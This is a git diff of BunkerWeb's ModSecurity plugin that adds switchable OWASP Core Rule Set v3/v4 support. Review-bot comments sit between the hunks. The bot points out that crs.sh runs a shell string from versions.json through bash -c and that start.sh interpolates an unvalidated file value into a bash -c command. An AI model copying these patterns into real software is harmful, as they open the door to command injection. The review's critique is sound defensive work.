a limit. +#SecAction \ +# "id:900310,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_name_length=100" + +# Block request if the length of any argument value is too high +# Default: unlimited +# Example: 400 +# Uncomment this rule to set a limit. 
+#SecAction \ +# "id:900320,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.arg_length=400" + +# Block request if the total length of all combined arguments is too high +# Default: unlimited +# Example: 64000 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900330,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.total_arg_length=64000" + +# Block request if the file size of any individual uploaded file is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900340,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_file_size=1048576" + +# Block request if the total size of all combined uploaded files is too high +# Default: unlimited +# Example: 1048576 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900350,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.combined_file_sizes=1048576" + + +# +# -- [[ Easing In / Sampling Percentage ]] ------------------------------------- +# +# Adding the Core Rule Set to an existing productive site can lead to false +# positives, unexpected performance issues and other undesired side effects. +# +# It can be beneficial to test the water first by enabling the CRS for a +# limited number of requests only and then, when you have solved the issues (if +# any) and you have confidence in the setup, to raise the ratio of requests +# being sent into the ruleset. +# +# Adjust the percentage of requests that are funnelled into the Core Rules by +# setting TX.sampling_percentage below. The default is 100, meaning that every +# request gets checked by the CRS. The selection of requests, which are going +# to be checked, is based on a pseudo random number generated by ModSecurity. +# +# If a request is allowed to pass without being checked by the CRS, there is no +# entry in the audit log (for performance reasons), but an error log entry is +# written. 
If you want to disable the error log entry, then issue the +# following directive somewhere after the inclusion of the CRS +# (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). +# +# SecRuleUpdateActionById 901150 "nolog" +# +# ATTENTION: If this TX.sampling_percentage is below 100, then some of the +# requests will bypass the Core Rules completely and you lose the ability to +# protect your service with ModSecurity. +# +# Uncomment this rule to enable this feature: +# +#SecAction "id:900400,\ +# phase:1,\ +# pass,\ +# nolog,\ +# setvar:tx.sampling_percentage=100" + + +# +# -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ +# +# Optionally, you can check the client IP address against the Project Honey Pot +# HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a +# free API key. Set it here with SecHttpBlKey. +# +# Project Honeypot returns multiple different malicious IP types. +# You may specify which you want to block by enabling or disabling them below. +# +# Ref: https://www.projecthoneypot.org/httpbl.php +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey +# +# Uncomment these rules to use this feature: +# +#SecHttpBlKey XXXXXXXXXXXXXXXXX +#SecAction "id:900500,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.block_search_ip=1,\ +# setvar:tx.block_suspicious_ip=1,\ +# setvar:tx.block_harvester_ip=1,\ +# setvar:tx.block_spammer_ip=1" + + +# +# -- [[ GeoIP Database ]] ------------------------------------------------------ +# +# There are some rulesets that inspect geolocation data of the client IP address +# (geoLookup). The CRS uses geoLookup to implement optional country blocking. +# +# To use geolocation, we make use of the MaxMind GeoIP database. +# This database is not included with the CRS and must be downloaded. +# +# There are two formats for the GeoIP database. 
ModSecurity v2 uses GeoLite (.dat files), +# and ModSecurity v3 uses GeoLite2 (.mmdb files). +# +# If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, +# see https://github.com/maxmind/geoipupdate. +# +# Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ +# for configuration options. +# +# Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. +# See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. +# +# Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files +# from CSV files first. +# +# You can achieve this using https://github.com/sherpya/geolite2legacy +# Pick the zip files from maxmind site: +# https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip +# +# Follow the guidelines for installing the tool and run: +# ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ +# -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat +# +# Update the database regularly, see Step 3 of the configuration link above. +# +# By default, when you execute `sudo geoipupdate` on Linux, files from the free database +# will be downloaded to `/usr/share/GeoIP` (both v1 and v2). +# +# Then choose from: +# - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) +# - `GeoLiteCountry.dat` (if you are using ModSecurity v2) +# +# Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html +# Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html +# +# Uncomment only one of the next rules here to use this feature. 
+# Choose the one depending on the ModSecurity version you are using, and change the path accordingly: +# +# For ModSecurity v3: +#SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb +# For ModSecurity v2 (points to the converted one): +#SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat + +# +# -=[ Block Countries ]=- +# +# Rules in the IP Reputation file can check the client against a list of high +# risk country codes. These countries have to be defined in the variable +# tx.high_risk_country_codes via their ISO 3166 two-letter country code: +# https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements +# +# If you are sure that you are not getting any legitimate requests from a given +# country, then you can disable all access from that country via this variable. +# The rule performing the test has the rule id 910100. +# +# This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be +# downloaded (see the section "GeoIP Database" above.) +# +# By default, the list is empty. A list used by some sites was the following: +# setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900600,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.high_risk_country_codes='" + + +# +# -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ +# +# Optional DoS protection against clients making requests too quickly. +# +# When a client is making more than 100 requests (excluding static files) within +# 60 seconds, this is considered a 'burst'. After two bursts, the client is +# blocked for 600 seconds. +# +# Requests to static files are not counted towards DoS; they are listed in the +# 'tx.static_extensions' setting, which you can change in this file (see +# section "HTTP Policy Settings"). +# +# For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. 
+# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900700,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.dos_burst_time_slice=60',\ +# setvar:'tx.dos_counter_threshold=100',\ +# setvar:'tx.dos_block_timeout=600'" + + +# +# -- [[ Check UTF-8 encoding ]] ------------------------------------------------ +# +# The CRS can optionally check request contents for invalid UTF-8 encoding. +# We only want to apply this check if UTF-8 encoding is actually used by the +# site; otherwise it will result in false positives. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900950,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.crs_validate_utf8_encoding=1" + + +# +# -- [[ Blocking Based on IP Reputation ]] ------------------------------------ +# +# Blocking based on reputation is permanent in the CRS. Unlike other rules, +# which look at the individual request, the blocking of IPs is based on +# a persistent record in the IP collection, which remains active for a +# certain amount of time. +# +# There are two ways an individual client can become flagged for blocking: +# - External information (RBL, GeoIP, etc.) +# - Internal information (Core Rules) +# +# The record in the IP collection carries a flag, which tags requests from +# individual clients with a flag named IP.reput_block_flag. +# But the flag alone is not enough to have a client blocked. There is also +# a global switch named tx.do_reput_block. This is off by default. If you set +# it to 1 (=On), requests from clients with the IP.reput_block_flag will +# be blocked for a certain duration. 
+# +# Variables +# ip.reput_block_flag Blocking flag for the IP collection record +# ip.reput_block_reason Reason (= rule message) that caused to blocking flag +# tx.do_reput_block Switch deciding if we really block based on flag +# tx.reput_block_duration Setting to define the duration of a block +# +# It may be important to know, that all the other core rules are skipped for +# requests, when it is clear that they carry the blocking flag in question. +# +# Uncomment this rule to use this feature: +# +#SecAction \ +# "id:900960,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.do_reput_block=1" +# +# Uncomment this rule to change the blocking time: +# Default: 300 (5 minutes) +# +#SecAction \ +# "id:900970,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.reput_block_duration=300" + + +# +# -- [[ Collection timeout ]] -------------------------------------------------- +# +# Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) +# to a lower setting which is appropriate to most sites. +# This increases performance by cleaning out stale collection (block) entries. +# +# This value should be greater than or equal to: +# tx.reput_block_duration (see section "Blocking Based on IP Reputation") and +# tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). +# +# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout + +# Please keep this directive uncommented. +# Default: 600 (10 minutes) +SecCollectionTimeout 600 + + +# +# -- [[ End of setup ]] -------------------------------------------------------- +# +# The CRS checks the tx.crs_setup_version variable to ensure that the setup +# has been loaded. If you are not planning to use this setup template, +# you must manually set the tx.crs_setup_version variable before including +# the CRS rules/* files. +# +# The variable is a numerical representation of the CRS version number. +# E.g., v3.0.0 is represented as 300. 
+# +SecAction \ + "id:900990,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + setvar:tx.crs_setup_version=335" diff --git a/src/common/core/modsecurity/files/crs-setup.conf b/src/common/core/modsecurity/files/crs-setup-v4.conf similarity index 100% rename from src/common/core/modsecurity/files/crs-setup.conf rename to src/common/core/modsecurity/files/crs-setup-v4.conf diff --git a/src/common/core/modsecurity/misc/crs.sh b/src/common/core/modsecurity/misc/crs.sh index 037b90f3b..6d9f51028 100755 --- a/src/common/core/modsecurity/misc/crs.sh +++ b/src/common/core/modsecurity/misc/crs.sh @@ -3,7 +3,12 @@ function git_secure_clone() { repo="$1" commit="$2" - folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")" + folder="$3" + + if [ -z "$folder" ] || [ "$folder" == "" ] ; then + folder="$(echo "$repo" | rev | cut -d '/' -f 1 | rev | sed -E "s@\.git@@")" + fi + if [ ! -d "files/${folder}" ] ; then output="$(git clone "$repo" "files/${folder}" 2>&1)" # shellcheck disable=SC2181 @@ -45,11 +50,25 @@ function do_and_check_cmd() { echo "$output" exit $ret fi - #echo $output return 0 } -# CRS v4.0.0 -echo "ℹ️ Download CRS" -git_secure_clone "https://github.com/coreruleset/coreruleset.git" "1d95422bb31983a5290720b7fb662ce3dd51f753" -do_and_check_cmd cp -r files/coreruleset/crs-setup.conf.example files/crs-setup.conf +rm -rf files/* + +jq -c .git_repository[] misc/versions.json | while read -r repo +do + id="$(echo "$repo" | jq -r .id)" + name="$(echo "$repo" | jq -r .name)" + url="$(echo "$repo" | jq -r .url)" + commit="$(echo "$repo" | jq -r .commit)" + post_install="$(echo "$repo" | jq -r .post_install)" + + echo "ℹ️ Clone ${name} from $url at commit/version $commit" + + git_secure_clone "$url" "$commit" "$id" + + if [ "$post_install" != "null" ]; then + echo "ℹ️ Running post install script for ${name}" + bash -c "$post_install" + fi +done 
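Review bot: The empty-folder test added to `git_secure_clone` checks the same condition twice, since `[ -z "$folder" ]` and `[ "$folder" == "" ]` are equivalent; `if [ -z "$folder" ] ; then` is enough. The fallback name is built with `rev | cut | rev | sed -E "s@\.git@@"`, and because the sed pattern is not anchored it removes the first `.git` anywhere in the name rather than only a trailing suffix; `folder="$(basename "$repo" .git)"` does the same job in one call. Because `folder` can now be supplied by the caller and ends up in `files/${folder}`, it would also be worth rejecting a value that contains `/` before cloning. The function body continues outside the hunk.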
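Review bot: The exit status of `bash -c "$post_install"` in the new loop is never checked, so a failed copy leaves `files/crs-setup-v3.conf` or `files/crs-setup-v4.conf` missing while the script carries on. The removed code ran its `cp` through `do_and_check_cmd`, and the new line can do the same with `do_and_check_cmd bash -c "$post_install"`. `rm -rf files/*` also runs before anything has been validated and is relative to the working directory: if `misc/versions.json` is missing or malformed, `jq` fails, the loop runs zero times and, with no `pipefail` set in the visible lines, the script appears to end successfully with an empty `files/`. Checking that `jq` can parse the file before the `rm`, and changing into the plugin directory explicitly first, would close both gaps.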
diff --git a/src/common/core/modsecurity/misc/versions.json b/src/common/core/modsecurity/misc/versions.json
new file mode 100644
index 000000000..7a2fa6df8
--- /dev/null
+++ b/src/common/core/modsecurity/misc/versions.json
@@ -0,0 +1,18 @@
+{
+ "git_repository": [
+ {
+ "id": "coreruleset-v3",
+ "name": "Coreruleset v3.3.5",
+ "url": "https://github.com/coreruleset/coreruleset.git",
+ "commit": "0bd51ff806c68e2a54c4d60ca13f731c5355696d",
+ "post_install": "cp files/coreruleset-v3/crs-setup.conf.example files/crs-setup-v3.conf"
+ },
+ {
+ "id": "coreruleset-v4",
+ "name": "Coreruleset v4.0.0",
+ "url": "https://github.com/coreruleset/coreruleset.git",
+ "commit": "1d95422bb31983a5290720b7fb662ce3dd51f753",
+ "post_install": "cp files/coreruleset-v4/crs-setup.conf.example files/crs-setup-v4.conf"
+ }
+ ]
+}
diff --git a/src/common/core/modsecurity/plugin.json b/src/common/core/modsecurity/plugin.json
index 4b4d302df..7a9a7f277 100644
--- a/src/common/core/modsecurity/plugin.json
+++ b/src/common/core/modsecurity/plugin.json
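Review bot: `post_install` holds a free-form shell string that `misc/crs.sh` passes to `bash -c`, which turns this data file into executable build input: a later edit here runs commands without any script changing, and is easy to miss in review. Both entries only copy `crs-setup.conf.example` to `files/crs-setup-v3.conf` and `files/crs-setup-v4.conf`, so the copy could be done by `crs.sh` itself from a plain field that names the target file, and `post_install` could be dropped. Pinning each entry to a full commit hash rather than a tag is the right choice and should be kept when new versions are added.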
@@ -1,56 +1,66 @@ -{ - "id": "modsecurity", - "name": "ModSecurity", - "description": "Management of the ModSecurity WAF.", - "version": "1.0", - "stream": "no", - "settings": { - "USE_MODSECURITY": { - "context": "multisite", - "default": "yes", - "help": "Enable ModSecurity WAF.", - "id": "use-modsecurity", - "label": "Use ModSecurity", - "regex": "^(yes|no)$", - "type": "check" - }, - "USE_MODSECURITY_CRS": { - "context": "multisite", - "default": "yes", - "help": "Enable OWASP Core Rule Set.", - "id": "use-modsecurity-crs", - "label": "Use Core Rule Set", - "regex": "^(yes|no)$", - "type": "check" - }, - "MODSECURITY_SEC_AUDIT_ENGINE": { - "context": "multisite", - "default": "RelevantOnly", - "help": "SecAuditEngine directive of ModSecurity.", - "id": "modsecurity-sec-audit-engine", - "label": "SecAuditEngine", - "regex": "^(On|RelevantOnly|Off)$", - "type": "select", - "select": ["On", "RelevantOnly", "Off"] - }, - "MODSECURITY_SEC_RULE_ENGINE": { - "context": "multisite", - "default": "On", - "help": "SecRuleEngine directive of ModSecurity.", - "id": "modsecurity-sec-rule-engine", - "label": "SecRuleEngine", - "regex": "^(On|DetectionOnly|Off)$", - "type": "select", - "select": ["On", "DetectionOnly", "Off"] - }, - "MODSECURITY_SEC_AUDIT_LOG_PARTS": { - "context": "multisite", - "default": "ABCFHZ", - "help": "SecAuditLogParts directive of ModSecurity.", - "id": "modsecurity-sec-audit-log-parts", - "label": "SecAuditLogParts", - "regex": "^A(([B-K])(?!.*\\2))+Z$", - "type": "text" - } - } -} +{ + "id": "modsecurity", + "name": "ModSecurity", + "description": "Management of the ModSecurity WAF.", + "version": "1.0", + "stream": "no", + "settings": { + "USE_MODSECURITY": { + "context": "multisite", + "default": "yes", + "help": "Enable ModSecurity WAF.", + "id": "use-modsecurity", + "label": "Use ModSecurity", + "regex": "^(yes|no)$", + "type": "check" + }, + "USE_MODSECURITY_CRS": { + "context": "multisite", + "default": "yes", + "help": "Enable OWASP Core 
Rule Set.", + "id": "use-modsecurity-crs", + "label": "Use Core Rule Set", + "regex": "^(yes|no)$", + "type": "check" + }, + "MODSECURITY_CRS_VERSION": { + "context": "multisite", + "default": "3", + "help": "Version of the OWASP Core Rule Set to use.", + "id": "modsecurity-crs-version", + "label": "Core Rule Set Version", + "regex": "^(3|4)$", + "type": "select", + "select": ["3", "4"] + }, + "MODSECURITY_SEC_AUDIT_ENGINE": { + "context": "multisite", + "default": "RelevantOnly", + "help": "SecAuditEngine directive of ModSecurity.", + "id": "modsecurity-sec-audit-engine", + "label": "SecAuditEngine", + "regex": "^(On|RelevantOnly|Off)$", + "type": "select", + "select": ["On", "RelevantOnly", "Off"] + }, + "MODSECURITY_SEC_RULE_ENGINE": { + "context": "multisite", + "default": "On", + "help": "SecRuleEngine directive of ModSecurity.", + "id": "modsecurity-sec-rule-engine", + "label": "SecRuleEngine", + "regex": "^(On|DetectionOnly|Off)$", + "type": "select", + "select": ["On", "DetectionOnly", "Off"] + }, + "MODSECURITY_SEC_AUDIT_LOG_PARTS": { + "context": "multisite", + "default": "ABCFHZ", + "help": "SecAuditLogParts directive of ModSecurity.", + "id": "modsecurity-sec-audit-log-parts", + "label": "SecAuditLogParts", + "regex": "^A(([B-K])(?!.*\\2))+Z$", + "type": "text" + } + } +} diff --git a/src/linux/scripts/start.sh b/src/linux/scripts/start.sh index 4710fd5d9..6eae40b9c 100644 --- a/src/linux/scripts/start.sh +++ b/src/linux/scripts/start.sh 
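Review bot: The new `MODSECURITY_CRS_VERSION` setting declares `"default": "3"`, and the CHANGELOG entry in this commit says the default is v3, but the `src/linux/scripts/start.sh` hunks of the same commit write `MODSECURITY_CRS_VERSION=4` into the dummy `variables.env` and fall back to `"4"` when the key is absent. A Linux install would therefore come up on rule set v4 while the plugin default is v3, so the rules that are enforced depend on how BunkerWeb was installed. One value should be chosen and used in all three places, for example `MODSECURITY_CRS_VERSION="3"` as the fallback in `start.sh`. The hunk also replaces every line of the file although only this setting is new, presumably a line-ending change, which makes the functional change hard to spot.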
@@ -96,7 +96,7 @@ function start() { # Create dummy variables.env if [ ! -f /etc/bunkerweb/variables.env ]; then - sudo -E -u nginx -g nginx /bin/bash -c "echo -ne '# remove IS_LOADING=yes when your config is ready\nIS_LOADING=yes\nDNS_RESOLVERS=8.8.8.8 8.8.4.4\nHTTP_PORT=80\nHTTPS_PORT=443\nAPI_LISTEN_IP=127.0.0.1\nSERVER_NAME=\n' > /etc/bunkerweb/variables.env" + sudo -E -u nginx -g nginx /bin/bash -c "echo -ne '# remove IS_LOADING=yes when your config is ready\nIS_LOADING=yes\nDNS_RESOLVERS=8.8.8.8 8.8.4.4\nHTTP_PORT=80\nHTTPS_PORT=443\nAPI_LISTEN_IP=127.0.0.1\nSERVER_NAME=\nMODSECURITY_CRS_VERSION=4\n' > /etc/bunkerweb/variables.env" log "SYSTEMCTL" "ℹ️" "Created dummy variables.env file" fi 
@@ -151,7 +151,11 @@ function start() { if [ "$HTTPS_PORT" = "" ] ; then HTTPS_PORT="443" fi - sudo -E -u nginx -g nginx /bin/bash -c "echo -ne 'IS_LOADING=yes\nUSE_BUNKERNET=no\nSEND_ANONYMOUS_REPORT=no\nSERVER_NAME=\nDNS_RESOLVERS=${DNS_RESOLVERS}\nAPI_HTTP_PORT=${API_HTTP_PORT}\nAPI_LISTEN_IP=${API_LISTEN_IP}\nAPI_SERVER_NAME=${API_SERVER_NAME}\nAPI_WHITELIST_IP=${API_WHITELIST_IP}\nUSE_REAL_IP=${USE_REAL_IP}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL}\nREAL_IP_FROM=${REAL_IP_FROM}\nREAL_IP_HEADER=${REAL_IP_HEADER}\nHTTP_PORT=${HTTP_PORT}\nHTTPS_PORT=${HTTPS_PORT}\n' > /var/tmp/bunkerweb/tmp.env" + MODSECURITY_CRS_VERSION="$(grep "^MODSECURITY_CRS_VERSION=" /etc/bunkerweb/variables.env | cut -d '=' -f 2)" + if [ "$MODSECURITY_CRS_VERSION" = "" ] ; then + MODSECURITY_CRS_VERSION="4" + fi + sudo -E -u nginx -g nginx /bin/bash -c "echo -ne 'IS_LOADING=yes\nUSE_BUNKERNET=no\nSEND_ANONYMOUS_REPORT=no\nSERVER_NAME=\nMODSECURITY_CRS_VERSION=${MODSECURITY_CRS_VERSION}\nDNS_RESOLVERS=${DNS_RESOLVERS}\nAPI_HTTP_PORT=${API_HTTP_PORT}\nAPI_LISTEN_IP=${API_LISTEN_IP}\nAPI_SERVER_NAME=${API_SERVER_NAME}\nAPI_WHITELIST_IP=${API_WHITELIST_IP}\nUSE_REAL_IP=${USE_REAL_IP}\nUSE_PROXY_PROTOCOL=${USE_PROXY_PROTOCOL}\nREAL_IP_FROM=${REAL_IP_FROM}\nREAL_IP_HEADER=${REAL_IP_HEADER}\nHTTP_PORT=${HTTP_PORT}\nHTTPS_PORT=${HTTPS_PORT}\n' > /var/tmp/bunkerweb/tmp.env" sudo -E -u nginx -g nginx /bin/bash -c "PYTHONPATH=/usr/share/bunkerweb/deps/python/ /usr/share/bunkerweb/gen/main.py --variables /var/tmp/bunkerweb/tmp.env --no-linux-reload" # shellcheck disable=SC2181 if [ $? -ne 0 ] ; then
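Review bot: The value read back from `/etc/bunkerweb/variables.env` is used without validation: `grep "^MODSECURITY_CRS_VERSION=" ... | cut -d '=' -f 2` returns several lines if the key appears more than once, and whatever it returns is spliced into the single-quoted string that `/bin/bash -c` executes. plugin.json restricts this setting to `^(3|4)$`, and applying the same check here keeps a stray quote or newline in the file from altering the command, e.g. `case "$MODSECURITY_CRS_VERSION" in 3|4) ;; *) MODSECURITY_CRS_VERSION="4" ;; esac` placed after the `grep`. The other variables in that string are interpolated the same way and would benefit from the same treatment. `start()` begins and ends outside the hunk.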